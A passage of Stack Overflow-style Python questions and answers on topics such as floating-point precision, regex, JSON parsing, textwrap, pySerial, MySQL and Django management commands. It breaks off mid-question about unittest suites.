After you read that, you'll better understand that you're _not_ adding one
one-hundredth in your code. This is exactly what you're adding:
>>> from decimal import Decimal
>>> Decimal(.01)
Decimal('0.01000000000000000020816681711721685132943093776702880859375')
That string shows the exact decimal value of the binary floating ("double
precision" in C) approximation to the exact decimal value 0.01. The thing
you're really adding is a little bigger than 1/100.
Controlling floating-point numeric errors is the field called "numerical
analysis", and is a very large and complex topic. So long as you're startled
by the fact that floats are just approximations to decimal values, use the
`decimal` module. That will take away a world of "shallow" problems for you.
For example, given this small modification to your function:
from decimal import Decimal as D
def sqrt(num):
root = D(0)
while root * root < num:
root += D("0.01")
return root
then:
>>> sqrt(4)
Decimal('2.00')
>>> sqrt(9)
Decimal('3.00')
It's not really more accurate, but may be less surprising in simple examples
because now it's adding _exactly_ one one-hundredth.
An alternative is to stick to floats and add something that _is_ exactly
representable as a binary float: values of the form `I/2**J`. For example,
instead of adding 0.01, add 0.125 (1/8) or 0.0625 (1/16).
Then look up "Newton's method" for computing square roots ;-)
|
python pattern identifier? regex?
Question: So what I need is to identify the pattern " X" or "spaceCAPITAL" examples:
string="Hello World, This is KZ"
And the program would pick out:
example_list = [W,T,K]
Answer:
>>> import re
>>> strs = "Hello World, This is KZ"
>>> re.findall(r'\s([A-Z])', strs)
['W', 'T', 'K']
|
Compiling and Executing Java file in python
Question: how can I open an java file in python?, i've search over the net and found
this:
import os.path, subprocess
from subprocess import STDOUT, PIPE
def compile_java (java_file):
subprocess.check_call(['javac', java_file])
def execute_java (java_file):
cmd=['java', java_file]
proc=subprocess.Popen(cmd, stdout = PIPE, stderr = STDOUT)
input = subprocess.Popen(cmd, stdin = PIPE)
print(proc.stdout.read())
compile_java("CsMain.java")
execute_java("CsMain")
but then I got this error:
Traceback (most recent call last):
File "C:\Python33\lib\subprocess.py", line 1106, in _execute_child
startupinfo)
FileNotFoundError: [WinError 2] The system cannot find the file specified
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\casestudy\opener.py", line 13, in <module>
compile_java("CsMain.java")
File "C:\casestudy\opener.py", line 5, in compile_java
subprocess.check_call(['javac', java_file])
File "C:\Python33\lib\subprocess.py", line 539, in check_call
retcode = call(*popenargs, **kwargs)
File "C:\Python33\lib\subprocess.py", line 520, in call
with Popen(*popenargs, **kwargs) as p:
File "C:\Python33\lib\subprocess.py", line 820, in __init__
restore_signals, start_new_session)
File "C:\Python33\lib\subprocess.py", line 1112, in _execute_child
raise WindowsError(*e.args)
FileNotFoundError: [WinError 2] The system cannot find the file specified
>>>
the python file and java file is in the same folder, and I am using Python
3.3.2, how can I resolve this? or do you guys have another way on doing this?,
any answer is appreciated thanks!
Answer: I think it isn't recognizing the `javac` command. Try manually running the
command and if `javac` isn't a recognized command, register it in your `PATH`
variable and try again.
Or you could just try typing the full pathname to the Java directory for
`javac` and `java`.
|
questions regarding Python namespaces and using import
Question: I'm playing around with Python today and trying out creating my own modules.
It seems I don't fully understand Python namespaces and I wonder if anyone
could answer my questions about them.
Here is an example of what I've done:
I've created a module named mytest with the following structure:
mytest/
....setup.py
....bin/
....docs/
....mytest/
........__init__.py
........test.py
....tests/
test.py contains one method as follows:
def say_hello():
print "Hello"
I've installed mytest via distutils. Using 'pip list' I can see the module is
installed.
All OK so far, but now I want to use it. I created a test script
moduletest.py:
from mytest import test
test.say_hello()
and running this works fine, the 'Hello' message is printed. I was happy with
this and started playing around with other methods of importing the module.
The following all seem to work OK:
from mytest.test import say_hello
say_hello()
And:
import mytest.test as test
test.say_hello()
But, the following will not work:
import mytest
test.say_hello()
And:
import mytest
mytest.test.say_hello()
And:
import mytest.test
test.say_hello()
Can anyone explain why you can't import the whole mytest module and then use
the parts you want, or why you have to alias test (import mytest.test as test)
in order to access it instead of just importing mytest.test (import
mytest.test)?
I guess my understanding is a bit off, but some explanation would really help.
Thanks!
Answer: When you do:
import mytest.test
It's adding `mytest.test` to the global namespace, not `test`. So what you
could do is:
import mytest.test
mytest.test.say_hello()
If you want to just use the line `import mytest`, what you need to do edit
your `__init__.py` file in you `mytest` directory to say:
import mytest.test
Then you can do this:
import mytest
mytest.test.say_hello()
|
Load multiple dictionaries from a file
Question: I have a file that looks like this:
{"cid" : "160686859281645","name" : "","s" : "JBLU131116P00011000","e" : "OPRA","p" : "-","c" : "-","b" : "3.60","a" : "3.80","oi" : "0","vol" : "-","strike" : "11.00","expiry" : "Nov 16, 2013"};
{"cid" : "721018656376031","name" : "","s" : "JBLU131116P00012000","e" : "OPRA","p" : "-","c" : "-","b" : "4.60","a" : "4.80","oi" : "0","vol" : "-","strike" : "12.00","expiry" : "Nov 16, 2013"};
How can I load these lines into Python so I can access the `key:value` pairs?
Answer: Those look like JSON serialized objects (apart from the trailing `;`).
Assuming that they are one per line, you can load them with:
import json
yourData = []
with open("fileName.txt") as inputData:
for line in inputData:
try:
yourData.append(json.loads(line.rstrip(';\n')))
except ValueError:
print "Skipping invalid line {0}".format(repr(line))
print yourData
If the JSON objects are not all one per line, you can read until you find a
`;` (outside a string literal) and process that with the same logic above,
instead of reading one line at a time. If the file is small, you could even
read it all in memory and split it.
Here we go:
>>> import json
>>>
>>> yourData = []
>>> with open("fileName.txt") as inputData:
... for line in inputData:
... try:
... yourData.append(json.loads(line.rstrip(';\n')))
... except ValueError:
... print "Skipping invalid line {0}".format(repr(line))
...
Skipping invalid line '\n'
>>> print yourData
[{u'a': u'3.80', u'c': u'-', u'b': u'3.60', u'e': u'OPRA', u'name': u'', u'oi': u'0', u'cid': u'160686859281645', u'vol': u'-', u'expiry': u'Nov 16, 2013', u'p': u'-', u's': u'JBLU131116P00011000', u'strike': u'11.00'}, {u'a': u'4.80', u'c': u'-', u'b': u'4.60', u'e': u'OPRA', u'name': u'', u'oi': u'0', u'cid': u'721018656376031', u'vol': u'-', u'expiry': u'Nov 16, 2013', u'p': u'-', u's': u'JBLU131116P00012000', u'strike': u'12.00'}]
>>>
>>> import pprint
>>> pprint.pprint(yourData
... )
[{u'a': u'3.80',
u'b': u'3.60',
u'c': u'-',
u'cid': u'160686859281645',
u'e': u'OPRA',
u'expiry': u'Nov 16, 2013',
u'name': u'',
u'oi': u'0',
u'p': u'-',
u's': u'JBLU131116P00011000',
u'strike': u'11.00',
u'vol': u'-'},
{u'a': u'4.80',
u'b': u'4.60',
u'c': u'-',
u'cid': u'721018656376031',
u'e': u'OPRA',
u'expiry': u'Nov 16, 2013',
u'name': u'',
u'oi': u'0',
u'p': u'-',
u's': u'JBLU131116P00012000',
u'strike': u'12.00',
u'vol': u'-'}]
|
How to extract string between selected string in python
Question: if i have a string like:
str = 'Hello, <code>This is the string i want to extract</code>'
Then how will i extract string that are between `<code>` and `</code>`, In
above case the extract string is:
'This is the string i want to extract'
I want to use this string in django filter.
Answer: Use a parser such as `BeautifulSoup`:
>>> from bs4 import BeautifulSoup as BS
>>> text = 'Hello, <code>This is the string i want to extract</code>'
>>> soup = BS(text)
>>> print soup.code.text
This is the string i want to extract
Or you can just use regex if it's just one line:
>>> import re
>>> re.search(r'<code>(.*?)</code>', text).group(1)
'This is the string i want to extract'
* * *
By the way, please don't name strings `str`. It will override the built-in
type.
|
Plot lines in different colors from color dictionary in Python
Question: I'm trying to plot the path of 15 different storms on a map in 15 different
colors. The color of the path should depend on the name of the storm. For
example if the storm's name is AUDREY, the color of the storm's path should be
red on the map. Could some please help/point me in the right direction?
Here's the part of my code:
import numpy as np
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import csv, os, scipy
import pandas
from PIL import *
data = np.loadtxt('louisianastormb.csv',dtype=np.str,delimiter=',',skiprows=1)
'''print data'''
fig = plt.figure(figsize=(12,12))
ax = fig.add_axes([0.1,0.1,0.8,0.8])
m = Basemap(llcrnrlon=-100.,llcrnrlat=0.,urcrnrlon=-20.,urcrnrlat=57.,
projection='lcc',lat_1=20.,lat_2=40.,lon_0=-60.,
resolution ='l',area_thresh=1000.)
m.bluemarble()
m.drawcoastlines(linewidth=0.5)
m.drawcountries(linewidth=0.5)
m.drawstates(linewidth=0.5)
# Creates parallels and meridians
m.drawparallels(np.arange(10.,35.,5.),labels=[1,0,0,1])
m.drawmeridians(np.arange(-120.,-80.,5.),labels=[1,0,0,1])
m.drawmapboundary(fill_color='aqua')
color_dict = {'AUDREY': 'red', 'ETHEL': 'white', 'BETSY': 'yellow','CAMILLE': 'blue', 'CARMEN': 'green',
'BABE': 'purple', 'BOB': '#ff69b4', 'FREDERIC': 'black', 'ELENA': 'cyan', 'JUAN': 'magenta', 'FLORENCE': '#faebd7',
'ANDREW': '#2e8b57', 'GEORGES': '#eeefff', 'ISIDORE': '#da70d6', 'IVAN': '#ff7f50', 'CINDY': '#cd853f',
'DENNIS': '#bc8f8f', 'RITA': '#5f9ea0', 'IDA': '#daa520'}
# Opens data file witn numpy
'''data = np.loadtxt('louisianastormb.csv',dtype=np.str,delimiter=',',skiprows=0)'''
'''print data'''
colnames = ['Year','Name','Type','Latitude','Longitude']
data = pandas.read_csv('louisianastormb.csv', names=colnames)
names = list(data.Name)
lat = list(data.Latitude)
long = list(data.Longitude)
colorName = list(data.Name)
#print lat
#print long
lat.pop(0)
long.pop(0)
latitude= map(float, lat)
longitude = map(float, long)
x, y = m(latitude,longitude)
#Plots points on map
for colorName in color_dict.keys():
plt.plot(x,y,'-',label=colorName,color=color_dict[colorName], linewidth=2 )
lg = plt.legend()
lg.get_frame().set_facecolor('grey')
plt.title('20 Hurricanes with Landfall in Louisiana')
#plt.show()
plt.savefig('20hurpaths1.jpg', dpi=100)
Here's the error message that I keep getting is:
Traceback (most recent call last):
File "/home/mikey1/lstorms.py", line 51, in <module>
plt.plot(x,y,'y-',color=colors[names], linewidth=2 )
TypeError: unhashable type: 'list'
>>>
Answer: You're accessing the dictionary entries incorrectly. First off you do this
`names = list(data.Name)`. So names is of type `lists`. Then you call
dictionary like this: `color_dict[names]`. The problem is not setting the
colour but how you try to access the dictionary (`list` is not a valid key).
Change it to something like:
for colourName in color_dict.keys():
plt.plot(x,y,'y-',color=color_dict[colourName], linewidth=2 ) # You need to use different data for the data series here.
And it'll work.
Also, your error message reads `plt.plot(x,y,'y-',color=colors[names],
linewidth=2 )` but in your code you've got `color=colors_dict[names]`. Are you
sure you posted the right code?
|
How to determine vCenter Server from a HostSystem object?
Question: I am querying ESX hosts, some of which are managed by a vCenter server, and
some are not. I want to find out the name of the vCenter server that manages
this host, if it there is one.
I'm using the Python psphere module, but all I want is the types of objects
and attributes I should be looking in. This is the relevant excerpt from my
code:
from psphere.client import Client
import psphere.managedobjects
items = []
cl = Client( hostname, userid, password )
dcs = psphere.managedobjects.Datacenter.all( cl )
I identify an ESX host vs. a vCenter server by checking the datacenters list:
if len( dcs ) == 1 and dcs[0].name == 'ha-datacenter':
hosts = psphere.managedobjects.HostSystem.all( cl )
Typically, hosts above will be a list of one element: the ESX host. I want to
know how to find out if there is a managing ESX server for this host. The
vSphere client does it, so there must be a way.
else: # This is a vCenter server, so we can drill down to find the ESX servers
for dc in dcs:
items.extend( getEntities( dc, [hostname] ) )
getEntities() is my own function for collecting details about hosts and
vCenter servers.
Answer: I found the following property within the `HostSystem` object:
`.summary.managementServerIp`. Not all `HostSystem` objects will have this
property, so I check for it as follows:
host = ... a HostSystem object, acquired as described in the question ...
if 'managementServerIp' in host.summary:
... do something with the management server IP address ...
|
Incorrect value from dynamodb table description and scan count
Question: I'm having a problem with dynamodb. I'm attempting to verify the data
contained within, but scan seems to be only returning a subset of the data,
here is the code I'm using with the python boto bindings
#!/usr/bin/python
#Check the scanned length of a table against the Table Description
import boto.dynamodb
#Connect
TABLENAME = "MyTableName"
sdbconn = boto.dynamodb.connect_to_region(
"eu-west-1",
aws_access_key_id='-snipped-',
aws_secret_access_key='-snipped-')
#Initial Scan
results = sdbconn.layer1.scan(TABLENAME,count=True)
previouskey = results['LastEvaluatedKey']
#Create Counting Variable
count = results['Count']
#DynamoDB scan results are limited to 1MB but return a Key value to carry on for the next MB
#so loop untill it does not return a continuation point
while previouskey != False:
results = sdbconn.layer1.scan(TABLENAME,exclusive_start_key=previouskey,count=True)
print(count)
count = count + results['Count']
try:
#get next key
previouskey = results['LastEvaluatedKey']
except:
#no key returned so thats all folks!
print(previouskey)
print("Reached End")
previouskey = False
#these presumably should match, they dont on the MyTableName Table, not even close
print(sdbconn.describe_table(TABLENAME)['Table']['ItemCount'])
print(count)
`print(sdbconn.describe_table)` gives me 1748175 and `print(count)` gives me
583021. I was the under the impression that these should always match? (I'm
aware of the 6 hour update) only 300 rows have been added in the last 24 hours
though does anyone know if this is an issue with dynamodb? or does my code
have a wrong assumption?
Answer: figured it out finally, its to do with Local Secondary Indexes, they show up
in the table description as unique items, the table has two LSI's causing it
to show 3x the number of items actually present
|
isinstance(foo, types.GeneratorType) or inspect.isgenerator(foo)?
Question: It seems that there are two ways in Python to test whether an object is a
generator:
import types
isinstance(foo, types.GeneratorType)
or:
import inspect
inspect.isgenerator(foo)
In the spirit of "There should be one-- and preferably only one --obvious way
to do it.", is one of these ways recommended over the other (presumably they
do the same thing...if not, please enlighten me!)?
Answer: They are 100% equivalent:
>>> print(inspect.getsource(inspect.isgenerator))
def isgenerator(object):
"""Return true if the object is a generator.
Generator objects provide these attributes:
__iter__ defined to support interation over container
close raises a new GeneratorExit exception inside the
generator to terminate the iteration
gi_code code object
gi_frame frame object or possibly None once the generator has
been exhausted
gi_running set to 1 when generator is executing, 0 otherwise
next return the next item from the container
send resumes the generator and "sends" a value that becomes
the result of the current yield-expression
throw used to raise an exception inside the generator"""
return isinstance(object, types.GeneratorType)
I'd say that using `isinstance(object, types.GeneratorType)` should be the
preferred way since it's clearer and simpler. Also `inspect.isgenerator` was
only added in python2.6, which means that using `isinstance` is more backward
compatible.
They probably added the `isgenerator` function for symmetry
[`isgeneratorfunction`](http://docs.python.org/2/library/inspect.html#inspect.isgeneratorfunction)
which does something different.
|
Compress Python Object in Memory
Question: Most tutorials on compressing a file in Python involve immediately writing
that file to disk with no intervening compressed python object. I want to know
how to pickle and then compress a python object in memory without ever writing
to or reading from disk.
Answer: I use this to save memory in one place:
import cPickle
import zlib
# Compress:
compressed = zlib.compress(cPickle.dumps(obj))
# Get it back:
obj = cPickle.loads(zlib.decompress(compressed))
If `obj` has references to a number of small objects, this can reduce the
amount of memory used by a lot. A lot of small objects in Python add up
because of per-object memory overhead as well as memory fragmentation.
|
how to istall opencv in EPD?
Question: There is no opencv in EPD 7.3.1. My EPD path is like /usr/epd
I have installed opencv using the method below the dashed line successfully .
Now cv2.so and cv.py are made in the directory /usr/local/lib/python2.7/site-
packages
But since my default python is epd, there is a path problem now. I copy cv2.so
and cv.py to /usr/epd/lib/python2.7/site-packages. Now I can import cv2 under
epd.
I am afraid there is a hidden trouble some day. Is my method right?
* * *
I just follow the link [opencv
install](http://docs.opencv.org/doc/tutorials/introduction/linux_install/linux_install.html)
Building OpenCV from Source Using CMake, Using the Command Line 1\. Create a
temporary directory, which we denote as , where you want to put the generated
Makefiles, project files as well the object files and output binaries.
2\. Enter the and type
cmake []
For example
cd ~/opencv
mkdir release
cd release
cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local ..
3\. Enter the created temporary directory () and proceed with:
make
sudo make install
Answer: Linux has a number of interfaces to opencv. Have you tried:
<http://docs.opencv.org/doc/tutorials/introduction/linux_install/linux_install.html>
or [OpenCV 2.4.3 and
Python](http://stackoverflow.com/questions/13381574/opencv-2-4-3-and-python)
|
Python urlopen error 404 directories
Question: I have this code :
from urllib.request import urlopen
from bs4 import BeautifulSoup
page = urlopen("http://www.doctoralia.com")
soup = BeautifulSoup(page)
myfile = open('data.txt','w')
myfile.write(soup.prettify())
myfile.close()
print('done boy !')
It works well ! but when I change `urlopen("http://www.doctoralia.com")` to
`urlopen("http://www.doctoralia.com/healthpros")` it throw me this error :
Traceback (most recent call last):
File "test.py", line 4, in <module>
page = urlopen("http://www.doctoralia.com/healthpros")
File "C:\Python33\lib\urllib\request.py", line 156, in urlopen
return opener.open(url, data, timeout)
File "C:\Python33\lib\urllib\request.py", line 475, in open
response = meth(req, response)
File "C:\Python33\lib\urllib\request.py", line 587, in http_response
'http', request, response, code, msg, hdrs)
File "C:\Python33\lib\urllib\request.py", line 513, in error
return self._call_chain(*args)
File "C:\Python33\lib\urllib\request.py", line 447, in _call_chain
result = func(*args)
File "C:\Python33\lib\urllib\request.py", line 595, in http_error_default
raise HTTPError(req.full_url, code, msg, hdrs, fp)
What's the problem ? Thanks
Answer: If you still want to see the actual code you have to handle this HTTPError.
Example:
from urllib.request import urlopen
from urllib.error import HTTPError
from bs4 import BeautifulSoup
try:
page = urlopen("http://www.doctoralia.com/healthpros")
except HTTPError as e:
if e.code == 404:
soup = BeautifulSoup(e.fp.read())
print(soup.prettify())
This will output the code if the page has given 404 HTTPError.
You can remove the if statement and do this for each HTTPError.
|
Virtual COM failing with pyserial/Linux, but working otherwise
Question: I am using Virtual COM Port (VCP) example code from
<http://blog.memsme.com/stm32f4-virtual-com-port-2/> on STM32F4 Discovery
Board to have USB VCP. This code is originally by ST and used by many other
people in their projects
Communication with the STM32F4 over VCP works fine from Windows. In Linux
(Ubuntu 12.04 x86), if I send data to the port with
echo "aasfg" > /dev/ttyACM0
then, the MCU gets the data and everything works fine. I can receive the
continuous data stream with
cat /dev/ttyACM0
However, if I send data with the simple Python script that uses pySerial
import serial
sercom = serial.Serial('/dev/ttyACM0')
sercom.write('asdf')
then I stop receiving data with the _cat_ command, and following _cat_
commands also don't receive any data. The MCU is constantly executing some USB
interrupt routines, never returning to execute actual application code. I can
receive data from VCP again after re-plugging the device.
The STM32 USB VCP code is probably not perfect, but it is used by many other
people in many projects so it should be good enough. I am not able to debug
that code. I suspect that sending data with pySerial does something with the
port that the VCP driver (either on STM32 or PC) does not like and I would
like to track it down and hopefully still use pySerial.
I executed
stty --file=/dev/ttyACM0 -a
before and after pyserial broke the communication. After breaking the VCP with
pyserial, setting _-clocal_ became _clocal_ and setting _min = 1_ became _min
= 0_. Are these relevant in VCP communication and could they hint how to fix
VCP with pySerial?
Answer: The serial port was actually fine. As I mentioned, the pySerial call changed
the port parameters. The param _min = 0_ meant that _cat /dev/ttyACM0_
returned immediately, reconfiguring to _min = 1_ with _stty_ made cat blocking
and outputted the data as before.
|
Python Help. Code is going past if/Else Statement
Question: The assignment is to write a code that can do triangles (find the perimeter,
area, if it is an equilateral, right, etc.)
I believe my code is on target, but it doesn't render an error like it should
when the numbers don't form a triangle. Any help would be greatly appreciated.
import math
A = int (input ("Type in your first integer that you would like to test:"))
print ("Your first integer to be tested is:", A)
B = int (input ("Type in your second integer that you would like to test:"))
print ("Your second integer to be tested is:", B)
C = int (input ("Type in your third integer that you would like to test:"))
print ("Your third integer to be tested is:", C)
if (A > B):
largest = A
else:
largest = B
if (C > largest):
largest = C
print ("The largest number is:", largest)
if A<=0 or B<=0 or C<=0:
print("The numbers don't form a triangle")
else:
print("The Triangle's Perimeter is:")
print(int(A+B+C))
print("The semiperimeter is:")
print(int((A+B+C)/2))
print("The Area of the triangle is:")
print (int (math.sqrt((A+B+C)/2)*(((A+B+C)/2)-A)*(((A+B+C)/2)-B)*(((A+B+C)/2)-C)))
if int(A != B and A != C and B != C):
print("The triangle is a scalene")
else:
print ("The triangle is not a scalene")
if int(A == B and B == A or A == C and C == A or C == B and B == C):
print ("The triangle is an isosceles")
else:
print ("The triangle is not an isosceles")
if int(A == B == C):
print("The triangle is an equilateral")
else:
print("The triangle is not an equilateral")
if int(C*C == A*A + B*B):
print("The triangle is a right triangle")
else:
print("The triangle is not a right triangle")
Answer: Try this code:
import math
def chkRectr(x1,x2,x3):
if (x1**2==x2**2+x3**2)or(x2**2==x1**2+x3**2)or(x3**2==x2**2+x1**2):
return True
else:
return False
def fHigh(aa,bb,cc):
d=math.sqrt(3)/2
if (aa==bb):
return math.sqrt(aa**2-(cc/2)**2)
elif (aa==cc):
return math.sqrt(aa**2-(bb/2)**2)
elif (bb==cc):
return math.sqrt(bb**2-(aa/2)**2)
def trikind():
if (a==b)or(b==c)or(a==c):
if a==b==c:
print("And it's kind: Equilateral triangle")
else:
if chkRectr(a,b,c)==True:
print("And it's kind: Isosceles rectanglar triangle")
else:
print("And it's kind: Isosceles triangle")
print("And its height is "+str(fHigh(a,b,c)))
elif chkRectr(a,b,c)==True:
print("And it's kind: Rectanglar triangle")
print("In this program I will tell you about existence of a triangle and kind of it.")
a,b,c=[float(x) for x in input("Enter three sides lenth(Split with ','): ").split(",")]
if a+b>c:
if b+c>a:
if c+a>b:
print("\nIt's a triangle!\n")
trikind()
else:
print("\nSorry but It's not a triangle!!!! :((")
It's different from what you mean but if you notice it's good at understanding
a triangle!!!
|
I need to load an excel file into python 2.7 using an interface
Question: in order to do some operations with it but I would like to do it from an
interface in order to select the file instead of just running a script with
the name of the file, as the file name will change every day.
Answer: You can use Tkinter `askopenfilename` :
from tkFileDialog import askopenfilename
path = askopenfilename()
f = open(path, 'r') # OR DO WHAT YOU WANT WITH PATH
|
How to put appropriate line breaks in a string representing a mathematical expression that is 9000+ characters?
Question: I have a many long strings (9000+ characters each) that represent mathematical
expressions. I originally generate the expressions using sympy, a python
symbolic algebra package. A truncated example is:
a = 'm[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 + zb[layer]*m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 - zt[layer]*m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[layer])'
I end up copying the text in the string and then using is as code (i.e. copy
the text between ' and ' and then paste it into a function as code):
def foo(args):
return m[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 + zb[layer]*m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 - zt[layer]*m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[layer])
The long lines of code become unwieldy and slow down my IDE (Spyder) so I want
to put some linebreaks in (the code works fine as one long line). I have
successfully done this manually by enclosing the expression in brackets and
putting in linebreaks myself (i.e. use implicit line contnuation as per
[PEP8](http://www.python.org/dev/peps/pep-0008/#id13)):
def foo(args):
return (m[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 +
zb[layer]*m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 -
zt[layer]*m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[layer]))
I'd like some function or functionality that will put in the linebreaks for
me. I've tried using the `textwrap` module but that splits the line an
inappropriate places. For example in the code below the last line splits in
the middle of 'layer' which invalidates my mathematical expression:
>>> import textwrap
>>> a = 'm[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 + zb[layer]*m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 - zt[layer]*m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[layer])'
>>> print(textwrap.fill(a,width=70))
m[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 +
zb[layer]*m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 -
zt[layer]*m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[lay
er])
My rules of thumb for manually splitting the string and still having a valid
expression when I paste the string as code are:
1. enclose whole expression in `()`.
2. split at approximately 70 characters wide after white-space or a `+`, `-`, `*`, `]`, `)`.
Answer: First, just passing
[`break_long_words=False`](http://docs.python.org/3.3/library/textwrap.html#textwrap.TextWrapper.break_long_words)
will prevent it from splitting `label` in the middle.
But that isn't enough to fix your problem. The output will be valid, but it
may exceed 70 columns. In your example, it will:
m[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 +
zb[layer]*m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 -
zt[layer]*m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[layer])
Fortunately, while `textwrap` can't do everything in the world, it also makes
good sample code. That's why [the
docs](http://docs.python.org/3.3/library/textwrap.html) link straight to [the
source](http://hg.python.org/cpython/file/3.3/Lib/textwrap.py).
What you want is essentially the `break_on_hyphens`, but breaking on
arithmetic operators as well. So, if you just change the regexp to use
`(-|\+|\*\*|\*)` in `wordsep_re`, that may be all it takes. Or it may take a
bit more work, but it should be easy to figure out from there.
Here's an example:
class AlgebraWrapper(textwrap.TextWrapper):
wordsep_re = re.compile(r'(\s+|(?:-|\+|\*\*|\*|\)|\]))')
w = AlgebraWrapper(break_long_words=False, break_on_hyphens=True)
print w.fill(a)
This will give you:
m[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 + zb[layer]*
m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 - zt[layer]*
m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[layer])
But really, you just got lucky that it didn't need to break on brackets or
parens, because as simple as I've written it, it will break before a bracket
just as easily as after one, which will be syntactically valid, but very ugly.
The same thing is true for operators, but it's far less ugly to break before a
`*` than a `]`. So, I'd probably split on just actual operators, and leave it
at that:
wordsep_re = re.compile(r'(\s+|(?:-|\+|\*\*|\*))')
If that's not acceptable, then you'll have to come up with the regexp you
actually want and drop it in place of `wordsep_re`.
* * *
An alternative solution is to decorate-wrap-undecorate. For example:
b = re.sub(r'(-|\+|\*\*|\*', r'\1 ', a)
c = textwrap.fill(b)
d = re.sub(r'(-|\+|\*\*|\*) ', r'\1', c)
Of course this isn't perfect—it won't prefer existing spaces over added
spaces, and it will fill to less than 70 columns (because it will be counting
those added spaces toward the limit). But if you're just looking for something
quick&dirty, it may serve, and if not, it may at least be a starting point to
what you actually need.
* * *
Either way, the easiest way to enclose the whole thing in parens is to do that
up-front:
if len(a) >= 70:
a = '({})'.format(a)
|
Error when installing Django using pythonbrew
Question: I am currently facing an issue when trying to install Django using pythonbrew.
My system is running ubuntu 12.04 (LTS) and I am following these instructions
to get django running:
<http://www.tangowithdjango.com/book/chapters/requirements.html#installing-
software>
I have followed everything exactly as specified by the book but when it comes
time to use Django on my pythonbrew version of Python, I get this error:
Traceback (most recent call last): File "", line 1, in ImportError: No module
named django
So I decided to do some investigating and I went into the folder that is now
specified as my PYTHONPATH for adding additional libraries, which is:
./.pythonbrew/pythons/Python-2.7.5/lib/python2.7/site-packages (I've left out
the above 2 folder levels, but my PYTHONPATH is correct, confirmed by echo
$PYTHONPATH)
In the site-packages folder, there is nothing there, which explains the Django
error.
So I switched off pythonbrew and then ran python and then 'import django' and
it worked.
This likely means that when trying to install stuff to Python, it is probably
not using the PYTHONPATH for some reason (or maybe something else).
I have taken a look here:
1) [Error after installing Django (supposed PATH or PYTHONPATH
"error")](http://stackoverflow.com/questions/2935723/error-after-installing-
django-supposed-path-or-pythonpath-error) (the solution and question seems
very different to mine, with slight similarities)
2) [how to install additional python packages with
pythonbrew](http://stackoverflow.com/questions/9217687/how-to-install-
additional-python-packages-with-pythonbrew) (the guy didn't get a response and
did a hack)
3) <http://suvashthapaliya.com/blog/2012/01/sandboxed-python-virtual-
environments/> (this guy recommends using virtualenv to create a virtual
environment before installing packages)
I'm not sure what to do now and I suspect the error is either with my
PYTHONPATH or there's some permission error that is causing all my installed
packages to go to the root python installation instead of the pythonbrew
package.
Any assistance will be greatly appreciated (also, this isn't a unique problem,
as I expect many others to face this installation issue with pythonbrew and
django).
Answer: I'm new in Stack Overflow, so I couldn't comment on your answer above about
what you got when running
pip -V
I had the same issue, but I fix it by doing what this post says:
[Using pip in pythonbrew](http://stackoverflow.com/questions/15096306/using-
pip-in-pythonbrew)
Hope this helps!
|
Python MySQL DB
Question: I have 4 tables in a Mysql Db named Employee. The structure of the tables are
as follows:
Edetails(**_id,name,age_**)
Edepartment(**_id,name,dept_**)
Edesignation(**_id,name,desig_**)
Esalary(**_id,name,basic,pf_**)
id is the primary key in all the tables. My question is when a user gives the
id of an employee how can i fetch **_id,name,age,basic,pf_** all at a time?? I
have created all tables and added entries using python. for fetching i used
the below code.
import MySQLdb as mdb
con = mdb.connect('localhost', 'root', 'root', 'Employee')
cur=con.cursor()
x=raw_input("Enter Employee id:")
cur.execute("Select * from Edepartment,Edesignation,Esalary,Edetails where dept.id=%s",(id))
res=cur.fetchall()
print res
Thanks in advance..
Answer: The `fetchall()` method gives you all rows in a set. Even if the result set
contains one record, you still have to do something like the following
import MySQLdb as mdb
con = mdb.connect('localhost', 'root', 'root', 'Employee')
cur=con.cursor()
x=raw_input("Enter Employee id:")
cur.execute("Select table1.id, table2.name from table1,table2 where dept.id=%s",(id))
results=cur.fetchall()
for result in results:
print 'id = %s' % result[0]
print 'name = %s' % result[1]
|
Running python manage.py command from django with arguments
Question: I have the command :
./manage.py dbbackup --clean --compress
provided by the django-dbbackup app which performs a backup of my PostgreSQL
database to Amazon S3. I am trying to run this command inside a django celery
task run daily.
When I run:
> from django.core.management import call_command
> call_command('dbbackup --clean --compress', interactive=False)
I am getting an exception because of the clean and compress arguments.
Any ideas on how I can run this command?
Answer: I magically found that running:
call_command('dbbackup', clean=True, compress=True, interactive=False)
works perfectly.
|
Good way to collect programmatically generated test suites in nose or pytest
Question: Say I've got a test suite like this:
class SafeTests(unittest.TestCase):
# snip 20 test functions
class BombTests(unittest.TestCase):
# snip 10 different test cases
I am currently doing the following:
suite = unittest.TestSuite()
